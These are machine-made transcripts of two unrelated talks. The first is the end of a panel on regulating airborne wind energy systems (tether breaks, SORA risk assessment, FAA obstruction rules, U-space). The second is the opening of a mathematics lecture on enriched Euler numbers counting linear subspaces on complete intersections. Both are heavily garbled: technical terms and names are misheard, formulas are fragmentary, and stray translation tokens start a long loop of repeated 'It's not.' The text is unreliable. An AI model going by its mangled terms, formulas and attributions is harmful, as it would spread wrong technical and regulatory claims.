having an unplanned event with any obstruction, whether it be an airborne wind turbine or a more conventional wind turbine, I think from a ground safety perspective, and we talked about that earlier, I think also you can use the same basic principles that are present in use today with horizontal axis wind turbines, but if the kite comes off the tether, it's no longer powered, it's not going very far, it's not going to fly from point A to point B, it's going to basically go straight down, which is very much similar to interblading wind turbines, which has happened. I think it's easy for us to get into this mindset now, where our systems are still relatively immature, and therefore maybe not as reliable as we want them to be in the future, but we need to imagine a future where the systems are highly reliable, and can therefore operate under the same constructs, the same procedures that the industry is using today, and if we have that in mind, we can leverage the existing commercial standards and practices that will help us integrate with the existing energy generation industry as it exists today. My final point before I hand it off to Mike is that what I think has been offered from IASA, etc., is certainly European focus, and I think if you look at where the markets are for everyone, they are not going to be in the scenarios that are mostly being considered. I generally agree with all experiences that we have in the first years to look at first that our system is safe, and the physics is safe, so to avoid as much as possible any problem. And then our actual testing area, we have the air range, so no airbag is allowed to come across. The eye-pick on me was high and 1.6 kM, I agree with that, but also there in any case that the airplane with the transport on board comes across and crosses this airspace, then our system recognizes this and goes below 100 feet to avoid the collision. So that's the same agreement we have with the rescue helicopters just 2 kM away, just more deep outside the speed range. If they have a approach or they launch, then we go down to 100 meters, and if the signal is lost, the car goes back to the operation. And then it's always we have to care about what happens if, and if we could use a kite, we have a safety device below the control pod, there's a safety line connected to the manual, so then the kite is flying out additional 20 meters and then is captured on the cap and coming down like a perch. And so if you add more of these safety measures, it was relatively easy, easy, perfect. Sorry, it was a long way, half a year, but I think finally we convinced also the flight safety operation people and also all the pilots around the airport's close transport. And it was a convincing work, yes, but finally it worked. So we look to ground. So my name is Nataniel Aptur, so I'm an advisor for the Federal Office of Civil Aviation, and I'm in charge in Switzerland for operational approvals, especially in the specific category that we were talking about before. I don't really want to position myself on this obstacle certification debate, because we Swiss almost keep you posted. I think we are in the end, most people would probably argue that we are here also in a new field where we come out of, first of all, the traditional agitation, but we also come out of the traditional wind turbines, so we have a new technology that needs to be handled in a way where the requirements are payload for the operations that you have. Especially because some of your devices are maybe 50 kilograms and some of your devices are maybe one ton, so you can not really use a common certification basis for all these technologies, right? I mean, you have the traditional CS22, but again, if you think about the risk of a device that is 40 or 50 kilograms, it wouldn't make any sense to apply a certification like CS22 or the ARDA, which is far more stringent than what actually should be applied for such an operation, which mostly happens on my offshore discussion. So I guess here I will agree with Mr. Mohrman on the fact that the specific operational risk assessment, his new guideline, the methodology provided by Jaros is probably the right tool to assess what is required and whether or not you comply with certification or with higher robustness level or lower robustness level. And this really entails also the more obstruction or obstacle debate in my opinion, because you can easily account the fact that it's an obstacle in the Torah and so allow operations to take place without much burdens in the end and without much involvement of the civilization authority. Yeah, I'm from Twintech and first of all I'm proud of that some people from Switzerland are sitting on this panel. I also show a bit that there's quite some work and action in this view of the world in our small country. Some people also say that Switzerland is the silicon valley of drones and that's true then it's also because of you guys, because you allow us to fly around with that. I think that's definitely one of the advantages of a small country that you can talk to people and they listen to you, or some of them at least. And yeah, just what I want to say, you went through this Torah process just this year and you didn't have a choice. But I think it was also, I mean, we finally got this permission out for our target system to fly and operate on two sides. And honestly, initially it was also a bit skeptical because we had an individual test since many years in Switzerland. Initially it was kind of a special arrangement and it somehow worked and it was fine. And then suddenly the sealed drone is coming up and you couldn't just handle the special case anymore. And it turned out that we somehow also had to fit into this kind of drone scheme. And what you didn't really realize is that this Torah process is actually, as you mentioned it, it really takes care of our special cases. So it's a risk assessment and basically the fact that we are headed, that we are not just flying over cities, that we normally operate over rural areas that also brings down the risk. And I think what we learned is really going through that process helped us a lot to understand the risk better and really come to a more safer solution. So at least at this point of time I would say that it's very helpful and I can just basically think it makes for every, every, every one of us that will offer a lot of sense at least to look at these documents and see what they can learn. Thank you. Yes, we hope that on this power, in fact I agree with everything that has been said before. There is an extension of the conflict and mostly I do subscribe to the roadmap that Christian presented in the beginning. And as for our own system, maybe it's particularly in the sense that for the case that the tether breaks or might break, we do intend to recover the aircraft so it has to fly back to our platform and be recovered. And also we have designed the architecture to eventually be able to find co-use configurations so it's farmers operating under our systems or maybe over a major reserve. People would visit this type of co-use. We have in mind, for this type of situation, the rules in Europe, here we are in aircraft. We have to follow the rules, the initial rules and then we end up in specific categories of operations with an aircraft that has to be certified. We end up not particularly afraid of that although we do want to also negotiate shortcuts and actually make proposals for them where we believe that it is possible and we do restrict the flight certificate for a special type of operations. We think this is really a flexible scheme at least in Europe. The specific operations, we can actually pick a certification standard and write our own accepted means of compliance and this is what we've done and we've proposed to YAS and it's up for approval there. And the last thing I want to say is that if we want to eventually have a commercial operation we want to achieve immense levels of reliability. The safety requirements for every other energy system are less demanding than the commercial requirements. So in that sense also for us it's not too intimidating. I just want to explain to you how we see the way to integrate the unmanned aircraft in the Earth space, also the urban energy system. It's so called the use-based program. The use-based program is the federated set of services designed to ensure safe, secure and efficient operations. So the first one is the integration of political men and unmanned aircraft in their Earth space, so in collaboration with all involved parties. So unmanned is also the so called drones and also the urban energy system. So why do we want this use-based? It is as you may know so there is a lot of airspace use on Earth. This is also the Earth team but now we have to deal with the drones and the operations with the drones are becoming more and more complicated. And their operators have this need to find beyond the life-side. So we created this new space in Switzerland but not also in Switzerland. So EASA is now writing a new regulation, so called the use-based regulation. And this set of services can be the detonation and avoid also geopencing. And there is a lot of services like the remote identification. So what's the point with the urban energy system? So there is three amount to see it. So we have these obstacles like in the United States of America, the certified like MPEX and so our process that we apply in Switzerland for now. And so when you are on an obstacle with the new services that we apply with the use-based, you are visible on our interface. So all the drones, operators, all the aircraft can just see that there is an obstacle and just avoid it. When you are certified, when you are in the SORA, you have to be cooperated. So you have to speak with each other with the unmanned aircraft but also with the aircraft. So how do we see this? So we have to use the new remote identification. So it has to be technology and virtual. So it will be network, broadcast or also transponder. So we have not a purpose, we have not decided but we just have to be cooperated. So this is the way we want to implement the new system of the use-based. And in America there is also a use-based called the UTM. But it's the same way to see it. So we try to implement it and it's on the way. So maybe one year we will have this interface. So this is the way we see the future with ElbaMint also. Thank you very much. Thank you very much. So to keep up the panel discussion, maybe because we've heard a number of interventions now from you, perhaps in the first round I would just give you the opportunity to answer to each other or whatever your comments to the other side before I hand this over to other questions. Does anybody want to react to what you said here? I think we are very much on the same layer. So we have known about safety. We just have different ways and that's where I thought the UTM presentation. So we have different ways of achieving this required level of safety. So different approaches are there. One of our applications are maybe it's your application or it should be your task is to harmonize it in a way. That's what I like about that you summarize this and give us options. And maybe there are one option, maybe there are two or maybe there are even three options there in place. And that's what we have to do to the way the standard rises that we get. One thing I forgot to mention is that there will be something like what is called an expanded scenario that the word is correct. So it can be an extended scenario like for example there is if you use drones within a small area, for example for inspecting wind turbines, there is denoted or there will be a standard scenario in the future. So all people will know exactly what to do and that's what we have to spend as a whole. So for example if a tether is broken or red or if you want to release a tether for some reason, then we start suddenly becoming an air vehicle at that moment. And that's what we have to solve and settle according to safety standards what we have to do. So what I'm listening here, that's pretty much the same. So if we know that we are in the airspace and in Germany we have the DFS, the Deutsche Unizide, we have them. And what we currently have here, we have an alphabet of my Germany also called the airfield energy. And all our data on each flight is automatically transported into the framework of the DFS. It's not a real transponder, they don't want to have thousands of transponder signals in the air, so that would confuse aviation at all. So they gave us some special mean how we can directly feed our information into the system. And that can be something that can help for the air pumping energy at all. So the standard is developed on AMPEX data, I really like the work. You have done and then there has to be a way. How nice or how can we make things more easy taking the new drone regulation, which will become active, that will relieve some equipment. We should make use of all of these effectiveness. Thank you. I think if I'll start with the common ground is that we all are focused on safety. So I think a final agreement across the panel that safety is got to be first. I think what I'd like to deposit is that the procedures and standards already exist. They exist for wind turbines today. And to call any of our systems a drone fundamentally misunderstands the technology. And to recreate a system, to recreate a process that has to be navigated and help the aviation world and regulators understand that new process will disadvantage airborne wind unnecessarily. So I'll give you the example of Makani in Hawaii. We have had a conversation going with the FAA for twice in time. We're less than five miles from an airport. We are just a few miles from military. The FAA has been out to observe the Makani system operate a couple of times and what they have determined, it is a temporary determination now that we expect by the end of the year that will be a permanent determination that will be regulated like any other wind turbine in the United States. That they wanted to have some say in how the kite was lightened in March but other than that, starting once we get this permanent determination which is eminent if we were to build a Makani site in Kansas or Florida or anywhere else Makani would submit an application for a determination of no hazard into the same line of, into the same group and the same exact application as anybody who is trying to put up a net tower or a tall building or to put up a wind turbine. It's the OE or the construction evaluation group. It's a process that already exists. It's a process that wind turbines have been, wind turbine farms or wind farms have been using for many, many years and now Makani is in a position where we're just going to fall in line with that same exact process. And I would say to go back my assertion that it's to fundamentally misunderstand the technology that we're all trying to bring to market is through that assessment to say again it solves the problem you're trying to solve. And I think going through all of this is going in a different direction. So I would ask all of us to think about what is the problem you're trying to solve. And as a pilot, again, I want to know what the obstructions on our route are. If I fail to do a map study, then I need to be able to, as a backup, I need to be able to see the system. Okay, comics. Yes. First of all, I forgot to say that before, but thanks a lot for inviting us from the POCA. I think it's really important to have this exchange between regulator and industry with the shades that we are the only regulator represented that I own. You should be changing. Actually, we are really proud because it's not a regulator. But yeah, so my opinion is really important to this exchange and for us to understand what your needs are and how the technology is evolving and for you to understand what we expect. And yeah, to come back on the standard scenario discussion, the standard scenarios that can be developed by the other are just restricted to low-race corporations, this represents in sole return to save two or more. So it could be the case for some operations, but that's just to keep in mind, right? To come back to the discussion about drones or not drones, I think in my opinion it's not really important to know whether it's a drone or not because obviously no one knows really what it is. I mean, it might be a drone in certain flight phases, it might be something else in other flight phases. Maybe it's a wind turbine. No one really knows and in my opinion it's an energy system which should be dealt as such, not as a drone or as a wind turbine or as anything else. But again, since your needs are really different, all these companies that are represented here have different sorts of devices. I think the solution that might be suitable for one might not be suitable for another. And that's why it's maybe also really important to have this discussion with the regulator and make him understand what your needs are. I mean, our duty is not to make your life complicated, right? Our duty is to ensure safety. I think the safest way to integrate it is not to consider it as a drone, but to consider it as an obstacle. Then you should be proactive and go to the airspace specialist at the EASA and tell them, well, look what we did with the FAA, look how they considered it, what reflections were behind it, and maybe they will recognize this way to handle those sorts of operations. And maybe you can also fly as an obstacle in Europe. I mean, regulation is anyway not static, right? It's something which is evolving over time, that's what we know. So in my opinion, what is really important in this discussion between the industry and the regulator because if there is no discussion, then we will make rules which do not make sense. Yeah, I like this approach, I must say. Because now we have a clear risk assessment at the end of the day, and on the other side, even we are fixed, we are moving and understanding pilots. I've been talking to pilots of the rescue helicopters and all these things because we are not fixed, we are moving target, so... And they are not sure if it's staying there or it's going away. So I understand. On the other point of view, on the discussions, I must say we didn't talk to the authorities, but we have to provide our experience. And that was the entrance for us to...in a discussion that we said, okay, first let's make it bad, first space where we can operate, and then let's observe what happens in the safety environment. And I would like to have the planes always transport, because these areas, just felt the height and the position, because then we can react, it's easy to react. But on the other side, I understand too much of the planes in the... On the other side, Europe is for us just as important for testing. And perhaps we're going to have in some years also we'll have to... which are clearly marked on each map and with lightness around it. Yeah? Our market for small products is in the ocean, the South America or whatever. And there we have other political interests in the environment. We have seen that also in Russia now, it's very easy. We had...we had just to provide them to a description of our safety measures. And then we are marked in the maps and then... Never let me care also. That's good to hear. I can maybe be here then I will ask how you... Yeah, I think we've all acknowledged that we are primarily developing an energy generation device. That is the purpose and that is how we should approach it. In the first instance, but we cannot also not deny that there is an element in it that is not like a wind turbine in my views. And I need to push it a little bit with when you look at your beautiful system in here. You say, look how beautiful it is rotating. You say, look how beautiful it's flying. You don't get the answer. I think of the word we use, I think it's less important than the actual space that occupies. Anyway, you understand my point. The cross, it's an aircraft because of the reason that you said it. And that you understand their own system quite well. But they can also see their other views. I think actually your case is a bit different. Your tender is really quite structural in its essence and quite static in our situation. We really have to design that tender as thin as possible as we used it in the book earlier. We don't want that to never break because that would be a way to have it reduced in order to perform. So we don't have to look for the difference and make it as thin as possible. So with the topic that I have, it is a little bit more likely that we would be able to have the same kind of option. Thank you. Well, the theory we have only five minutes left, but since we are in the last session of the day, we may go on. So let's open the floor and some other questions. Thank you. The question is, how on the FAA sees a data break or how do you somehow guarantee that the level breaks? Yeah, we discussed that with the FAA. It's a mechanical system. There's no way to guarantee that the Tether will never break. We described it as I did earlier, which is that when the kite comes off the Tether, it is unpowered and is therefore not going to go flying off across the night. I mean, honestly, that is a fundamental conversation we've had with basically every regulator that has come to talk to us. They come out there thinking drone, thinking that this is an airplane, and the minute they hear, oh, wait a second, it has no power if it comes off the Tether, they take a deep breath and they just say, I get it. Okay. Because the only place it's going at that point, it's going to have a splash pattern, of course. It's controlled or not in that splash pattern. Irrelevant. The point is, it's not going very far. And to the point of, again, if you think about it from a pilot's point of view, that's the problem we're trying to solve, is that there are other aircraft, other, whether it be drone or manned or unmanned, just take the pilot's point of view. It's not in one piece of the sky in one minute and another piece of the sky in another minute. It's not even global. Even if it's going up and down, even if it's going in wide circles, wider than a conventional wind turbine, it is still global. Think about how big the sky is if you're flying even just 50 miles. It's very low. Quick follow-up on this. Is it designed to not glide or can it not glide very far, especially with the time measures? I think that's, it's easy to imagine, let me answer it this way, easy to imagine programming the kite to seek upwind back towards the base station. So you don't really crash by the troops coming down smoothly? I mean, for the purposes of this discussion, it's kind of irrelevant, right? I think the point is... I don't understand, but you're saying we'll try to recover it with more progression. Yeah, but I still think that it doesn't fundamentally change the premise of our position that whether it comes down in a controlled manner right next to the base station, it is operable the next day, or it has a much more dramatic meaning with the Earth. Well, for me, it would make you... If you know it, it crashes down. For me, that sounds not so safe as I know it. I know it comes down like this on the kite or it moves you to the... This is where I want to answer it, but I think about the future, and it's true that today we're not allowing any people under our system. But think about Airbus. I got an Airbus A320 this morning. Sometimes airplanes crash, but I still got an airplane. At some point in the future, airborne wind is going to be reliable enough to where we're more comfortable taking risks, such as getting an airplane. Great. Any other questions? At this point, it's an airplane, and an airplane has to be registered as an airplane, and has to be tested as such. And if you allow people below your structure or your wind turbine or however you want to call it, it has to also be tested as an airplane as soon as it breaks. Like, yeah, it's flying. I think that's directed to me. I will say it's not an airplane. It operates using principles of aerodynamics that aeroplane uses, but functionally, it's a winter airplane. Maybe we can also... Yeah. Let me just comment on this. So what I assume, if it's easier for one of you to have it as a qualified... I don't use word search, but qualified as an aircraft, do it as an aircraft, do it this way. And it's easier for you, or reasonable for you, to qualify it as a device, like my car, than do it that way. I think there are both options available. But if you treat it, and I totally agree with what you said, if you treat it as an aircraft, for example, if you want to save it, the tether breaks, and then you have some wires landing it, maybe even in a position where you can do maintenance right away. So if you want to do this, and there's a way now, which is pretty easy to achieve, this Zora allows you to deal with that. And the Zora approach is getting much easier compared to what its typical certification was. So I think we need this freedom, and that's a system design, what we do in order to achieve it. So how we do it the way we have some un-picks powered, different other ways. So all of them are fine, and we just have to find a standard, which can, in a way, combine some of these, and you get to do the right options for those. I had a question regarding, you know, all the test installations, as well as the current installation, regarding the use of that airspace, and people nearby saying, hey, I don't want that in my airspace. I don't want that in my visual field, not in my back door. Have you experienced any feedback from the public about that, even with the test installation? Yes, we are testing on our side, like those two small footage. So, I really like the people who are doing the test, and all the other things, there are a lot of conventional windows, I think, that have been very convinced by the low noise, and that has always changed the position, and the most head-to-head low noise, and all the things that we've done from it. With people saying we don't want to see the system all the way back, or the neighbors say we don't. So, we have very good neighbors, actually, so we operate in a rural area, but it's definitely populated, so their houses are close by, and we have regular contact with the farmers, we contact them. So, before we do the operations, we check that we can find out about that, and we call the department Q and the advice, and we'll write them down. So, we have that at the operation. Do you have any questions? I'm actually going to consider the tank and the land, so that's probably what it is. But you're also talking about this active avoidance of air problem. I'm wondering how this fits with this obstacle view, and how often you think this should happen. Should there be more emergency hand-office? So, it's a regular operation, it's a plan B, because we have a better airspace, and airplanes are not allowed to cross. So, it's marked with a map, it's also indicated by no time, and the official information sites. But, nobody knows. Some body comes across and comes up with whatever and flies through this area. And there, we are looking at, you know where they are, and if they come close, then we can dive into that. That's the approach. It's a plan B. And this plan B is a plan A for the helicopter operators close by, for the rescue helicopters. So, there you agree with them, if they have no choice, if they have to start quickly, and if they have to take the direct way, and so, if they start the radio communication, our character is done. So, let's agree with them. And this operation is just because we are wearing clothes. It could be also a solution for other places in the world. But we are really in the moment looking for Germany or for Europe, just for three places where we plan to install such systems, because the market is out of order. Alexander will enter. To add on this question, so Germany is a low, and for next year, all the structure markers on the lead to ground will be only switched on on occasion. So, all of Germany should be connected to the radar, where it can be connected by law. And therefore, with our experience, maybe that answers your question, that the on time of these obstruction markers is about 25% depending on the region, and of course on the accuracy of the friction. So that's a lot of learning on some of the filters, how we can see the small birds and planes and the portion which is possible on the road, which can also be detected in the same ground. So, of course, when it comes to the question of what we are in terms of regulation, there is of course a future to have a lead to ground by means of an airborne device, which is not an obstruction, because there is no case where it appears in the air when it wouldn't be an obstruction, because it is hovered down and connected with the radar system. And what I think is a big achievement already for this industry is that we have, at least the Chief of the county and others to say, okay, here we have now an important anchor, all our safety considerations, that we ensure that this system is either visible, or it's not airborne, or it's not in the path of what they're flying. And I think there is something to work on this, and this will be something we can agree across all industry, and we should focus exactly on these basic principles of obstruction marketing and obstruction avoidance. I mean, so now we have five minutes. One quick suggestion, I think there are two completely different issues, and sometimes we forget that they're different, we can all, one is making sure that there is safety for other people who are in the air, pilots, and the other issue is safety for people who are on the ground. And these have to be thought of as two separate things, and just to clarify, McCloney's approach to the great job, we deal with safety for people in the air by the existing FAA obstruction, and actually we use the same approach in Norway, and we deal with safety for people on the ground by having huge exclusion zones and keeping people away from our system as it's still experimental. So, as we try to make progress this topic, let's be sure to look at which topic we're talking about. I would say we have a final round, everybody can say anything. The next issue is the FAA, but the SORA basically entails both the ground and the airways, and you're right, it's two separate things, but actually in the traditional aviation you assume that the people that you create safety for people on board, and because of that you secure people that are on board. And that's not for the, what is special with the specific operational risk assessment is it's a new approach which is based on the fact that there is no one on board, and since there is no one on board, you assume you search for the safety of other aircrafts, other airborne aircrafts, and then for people on the ground that you are not really searching for the safety of people on board because they're in the air. So, I think there is no one on board at least so far in on roads, and that's really part of the SORA also, and that's part of the world discussion. But I think the main issue we all have is space integration, and I guess, yeah, is that because that's what we mainly discussed here. Thank you. I'm sure they have much to add, but maybe also a little bit to your question. When we fly our systems, we actually have quite regularly aviation tourists that you can get restricted to, they fly around it. So it's very difficult to predict what is their plan, and at your plan, we don't have that, and we don't plan to avoid general aviation. They should just stay out of our area. You're also my answer, just to form a add that the most important thing is that we are in discussion with the military orders, and we have permission to fly as our system and learn. And so, I'm staying in touch and I'm trying to find the right way to really find the right tools for the proper development where we are. I think we're at least as fit as we can on a good track. Thank you. I think the first thing is that we have two major lines to say, and then the second is to prove that they say collaboration, and then start with the regulation of the rules. Yeah, I want to extend the idea that speaking with regulators early is important, so thanks for being here. Appreciate the conversation. And I think my part and thought would be to think about the inevitable success we're all going to have in a commercialization of our technologies, and what will enable that for a regulatory standpoint is aligning ourselves, not creating a whole new way forward, but aligning ourselves with an existing and workable solution. So I think at the end, you industry have to bring us your standard, your need, come to the regulator, and we will figure out with you what is the most applicable solution, and at least maybe come to the EU, and create maybe a new regulation or just complete a regulation and to have a solution harmonized for each technology. So you can open the market and just don't have one solution in one country and just operate with Zora and just operate our center side or as a obstacle. So just go, go, just bring the standard and just go for it. I think it's just important to make something like a risk assessment, whether it's based on an obstacle or whether it's based on a real flying system. So whoever has not had a look at Zora yet, he should do that, even if he thinks between an obstacle, we don't care, and Zora uses ground risk areas and all these aspects, and Zora will be of help, I'm pretty sure. Then discuss it with the regulators, and I have a couple of German regulators they will pay to open with that topic, so go ahead. Yes, Zora, thank you very much.
|
This panel discussion also includes a short presentation by Amanda Boekholt, Swiss Federal Office of Civil Aviation (FOCA), about the U Space set of federated services.
|
10.5446/50925 (DOI)
|
Thank you. It's been a very interesting summer school for me so far. So thank you very much everyone for putting this together and the opportunity to speak. This is all joint work with Tom Bachman that you heard from a few days ago. And we'll start with the application to counting linear subspaces. Let's give ourselves notation for K a field and F1 through Fj homogeneous polynomials that are going to cut out what's called a complete intersection on projective space. So there's the homogeneous coordinates of projective space and we can look at this variety which is the commons or alochists of F1 through Fj. And if this is dimension N minus J, that's what it means for X to be a complete intersection. So we're going to be counting linear subspaces. Let's say explicitly what a linear subspace is. So on R plane and X is a copy of P to the R cut out inside P to the N by linear equations. We're going to let these linear equations have coefficients in some field extension. And then we get it will be on R plane and X if it sits inside X viewed as a scheme over E. So there's our linear subspaces of dimension R. So the space of all linear subspaces is a cross monion. So this is a cross monion parameterizing the R's and PN. Equivalently it's the space of R plus one dimensional subspaces of an N plus one dimensional vector space. And we've got some different choices for notation for this. Let's go with GR, R, N and here if we have a subspace W, we can take its projectivization and we get a PR. We can even make it a different color. The subspace W is a point in this cross monion goes to its projectivization. And there we've got some notation for cross monion. Excuse me, there's a question for you in the chat. You want this. Great. Thank you. So Hain says it's just a closed subsc<|ru|><|translate|> sub scheme. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. It's not. Let's talk about a one Euler. Classes and numbers. And then we'll talk about the scheme. The scheme why. The section. S. And, um, uh, the, um, in the oriented Chow. Of why twisted by the, the duality determinant. Um, uh, And this other class was there was a, there's a one in oriented Chow. And, um, you can push forward the one by the section and pull back exactly as, um, as Mark outlined. Um, So, um, So, um, Although we haven't introduced, um, oriented Chow. It's a, a sum of, uh, of cycles with, with coefficients. Um, and, and let's, uh, Let's not worry about that. Uh, too much at the moment. And this was further developed by. Faisal and Ashok Faisal. And Mark Levine. Um, uh, And, um, Another description of the Euler class is it's a principal obstruction. To having a non vanishing section. And, uh, in a one algebraic topology over a field, Morrell develops an Euler class. Um, uh, encoding that, that principal obstruction. Um, In joint work with Jesse Cass, we made an Euler class, uh, designed for a new matter of problems. That was the sum of the, the degrees over the zeros of S. And, uh, Uh, of local degrees of S. This is an Euler number. Um, uh, in a beautiful paper on fundamental classes. And, uh, Dibleese, Jin and Khan, uh, give, uh, constructions of, of Euler classes. And in particular, Mark, uh, I'm going to talk about the Euler class. The value in co homology theories. Uh, that are represented by S. A l oriented. Um, uh, Spectra. Another thing that Mark, uh, talked to us about was a pairing on the causal complex. Um, uh, And, uh, In joint work with between Levine and Rack said. Um, I'm going to talk about the, the tangent bundle. Um, uh, my cock is actually, uh, after a talk, I gave, uh, I bulb, uh, the, the pairing on the casual and, and, and asserted it was the same. And I've heard, uh, Mark, uh, say a nice story about, um, a similar. Um, uh, responsive of, of, of Sarah. I'll just put everybody's, um, name down if, um, that's okay. Um, the, the last list in our, in our point of view on Euler class list that, that we have here. Um, is to take the opportunity, uh, to talk about my women in topology group. Looking at the Hock shield homology. Um, uh, and putting the pairing, um, that the, the folks who think of coherent duality in terms of Hock shield homology, um, give us, uh, and showing this is this, uh, a one Euler class. And this is work of Candice, Beth, uh, uh, Nini or Selamaya Morgan, OP, um, uh, Ines, Akarevich. So, um, one of the things done in the, in the paper that this talk is about is to check, um, qualities, um, for, for some of these. Uh, so, um, uh, the, the, these local degrees and the push forward and for appropriate E and the Kizul, um, uh, for, for general vector bundles. Um, uh, as a warning, um, there's a very interesting, um, uh, paper of Aschak and Fizal about comparing these two and they are equal up to a unit, but in a, in a context where there are actually quite a lot of units. Um, uh, uh, So, um, it's, it's an interesting, it's an interesting class. It's an interesting number and there are a lot of different points of view on it. Um, and, uh, for moving forward, uh, with, with the story, um, let's, let's summarize this by saying when Y over K is smooth, the dimension of Y is the rank of the bundle. And V is a generalization of orientable called relatively orientable. And then we have an Euler number. I'll call it E of V, uh, living in the growth and de-grid group of K. Um, I'm going to spell out what the growth and de-grid group of K is very explicitly because it's, um, concrete and our accounts record concrete, um, arithmetic information valued in this group. Um, and the growth and de-grid group of K is going to be. Uh, So, uh, let's let a, um, be a ring. And G. W. of A is going to be the group. Of, um, formal. Uh, differences. Of, um, of non-degenerate, uh, symmetric, uh, bilinear forms. And this group of formal differences called a group completion. And for a field, this has a very nice presentation. So presentation. For a, close K, a field. Then, uh, any, um, bilinear form, uh, can be di-symmetric, bilinear form can be diagonalized. So the generators. Are, uh, one dimensional forms. For a, For a field, A is going to be a, a, a, a, a, a, a, a, a, and K star over K tartar squared as an, uh, Mark's talk. A is on the one dimensional vector space K, K cross K to K. And we take as a bilinear form, we take X, Y to, to AX, Y. plus b equal a plus b when that's not one plus a b a plus b. And this implies that there are a bunch of ways to write a special form called the hyperbolic form that a plus minus a is this hyperbolic form h1 1 plus minus 1. I'll give a whole bunch of explicit examples. So the growth and date fit proof of c is that there's there up to squares all elements are the same in c star. So if we just take the underlying dimension of the vector space the growth and date fit group of c is z by the rank and over r when we diagonalize we have some number of ones and minus ones. The difference between those is the signature and that induces an isomorphism up to a parity condition. The for fields like a finite field with q elements or ct we have that the first two invariance of quadratic forms coming from the miller conjecture invariance give the whole growth and date growth and date fit group. The first two are the rank and the discriminant that's a determinant of of when you write the bilinear form as a matrix. So this goes to z to k star r over k star squared which let's say q is odd. I give z cross z mod 2 and then we have invariance coming from the miller conjecture which was a great achievement of of a1 homotopy theory. The the title of this talk was about integrality results and that means that we want to use where the vector bundle is defined. If it's defined over over z or some sort of ring of integers we want to compute or say things about the computation of what the Euler number is. So let's also say that the growth and date fit group of the integers although there are many very interesting highly non-trivial non-degenerate symmetric bilinear forms over z. Once you group complete you you only get z cross z it's a number of ones and number of minus ones. France for example sitting inside gw of q or dgw of r maybe maybe more straightforwardly. We have a miller exact sequence giving us the growth and date bit group of z1 over n and it'll sit inside the growth and date bit group of q and then there's some boundary maps to the bit group is the growth and date bit group divided by the the hyperbolic form for q not dividing n. The the last thing we'll need to state to state results are the explicitly giving transfers. We can assume the only thing we'll need to write down theorems is transfers for an extension of fields k l that we can assume to be finite separable because the de Vareman of El result will say that our zero look is smooth and so corresponds to separable extensions and then we will have a transfer map from l over k from the growth and date bit group of l to the growth and date bit group of k and it'll take a bilinear form beta v cross v to l and I'll take its class to the composition of beta with the sum of the Galois congiates the the trace from from from Galois theory. So let's let's talk more about the about growth and date bit but I also I want to pause for any questions so far. If you if you think of others please don't hesitate to interrupt. So the the GW of fields pieces together to make an unramified sheaf by a procedure in Morel's a1 algebraic topology so it gives unramified sheaf GW say on smooth schemes over k and the sections over x they're inside the sections on k of x on the on the field of functions of x and you can extend over any closed subset of co-dimension at least two. It's given by intersection of kernels of certain boundary maps for co-dimension one points and it has an alternative description. It's the sheafification in the Nisnevich or Zyrsky topology of sending x to GW of x where now this means the symmetric non-degenerate bilinear forms on vector bundles on our on our x and this is a great sheaf but from the perspective of of descent sheafifying isomorphism classes is an odd thing to do when we if we want to glue together objects we not only want to know their isomorphic on overlaps we might want to keep track of the data of that isomorphism have it satisfied conditions so one thing that that that comes up is that you can have a sheaf of spaces version make it a curly curly GW so let bilinear of x be the space of vector bundles with a symmetric non-degenerate bilinear form and then we can sheafify the group completion of this so let's let one half be invertible let's let these be schemes over the one half and have this be a sheaf valued in spaces and what let it be the sheafification of x goes to the group completion of the this these bilinear forms and there's a map to the sheaf of spaces associated to her mission k theory we've got a homotopy invariant version on the right and our sheaf version of Rothen diek that sheaves on the left we can take other classes in the in in her mission k theory or related theories and get good functoriality properties associated with them to give us integrality integrality results let's get back to counting our planes and less questions yes um so uh it's necessary to invert two um uh when when considering duality so bilinear forms there are a lot of different um that there when when two is not invertible bilinear forms and quadratic forms are different turns out there are a lot of different variants um uh uh for um uh for four notions of um uh of a duality on on vector bundles when when two is two is not invertible um uh so um it uh it makes a her mission k theory defined with with current uh machinery and there are a lot of interesting things to say about inverting two uh so so thank you for the the question returning to to counting our planes on complete intersections um let's listen to things we know um uh in in joint work uh with jesse cas we computed the account of lines on a on a cubic surface which is the the computation of the Euler number for sin three of s dual on the gross monion and it is 15 1 plus 12 times minus 1 and uh it's this is also a song over the lines of an index involving the field of definition of the line and some some information about how the tangent um how the tangent plane spins along the line um uh this is for k a field and um mark levine developed a theory of uh bit valued characteristic classes and uh computes that uh uh the Euler number of uh sin of uh 2d minus 1 of s dual counting lines um on uh um um pd plus 1 is uh 2d minus 1 factorial factorial tell you what that means uh plus a multiple of h and the multiple of h is is designed uh to make so ec for a Euler number of of complex points minus um 2d minus 1 factorial factorial over 2 times the cyberbolic form um so here uh 2d minus 1 uh factorial factorial is 2d minus 1 times 2d minus 3 times 1 and uh it's okay as a field um with with characteristic uh primed it to and times 2d minus 1 um and ec is the normal topological Euler number of the the complex points of c um uh steven mckin gave a enrichment of bazoo's theorem along with geometric interpretations of local indices and that gives the calculation of um vector bundles sort of counting points on p m that's just p n um the multiple of h and uh subrino pally also along with uh uh interesting geometric interpretations um uh re does the cubic surface and does the quintic threefold with um a theory of dynamic um intersections uh you can hear her talk about this at motive and motives and um and whatnot um coming soon um so we have uh enriched counts of of airplanes um let's uh formalize this notation ec so let's let um it's on july 29th thank you um so uh let's let ec be this uh Euler number of the complex points and er um be the Euler number of the real points and um uh a theorem i'd like to to talk about from this paper is um the the the enriched count is the sum of ones and minus ones that you would get from the from the real and and complex point counts so let's let um r be a ring with uh one half um uh in r let and you can also do just a field of characteristic two um we'll consider the vector bundle we started with um the sum of uh the di symmetric power of the dual tautological over um um uh the gross monion and let's let it be relatively um oriented with dimension of the uh the rank of the is the dimension of the gross monion um and uh so this has uh we can we can rewrite this in terms of parity conditions and sum conditions so i.e. we want the sum of di over r plus one uh di plus r choose r plus n plus one congruent to zero um mod two and the dimension equaling the rank uh dimension of gross monion r plus one times n minus r is the the rank di plus r choose r um uh and so uh then these vector bundles that we were interested in um the the Euler number is ec plus er over two times one plus ec minus er over two uh uh times times negative one um and for example we can get an enriched count of three planes on a generic seven-dimensional cubic hyper surface so there are 160 839 one plus 160 650 minus one three planes in a seven-dimensional um cubic um hyper surface and uh as uh to put this back in terms of um accounting r planes if we take the sum over the r planes we'll call the r plane p in our complete intersection x of the this trace we know 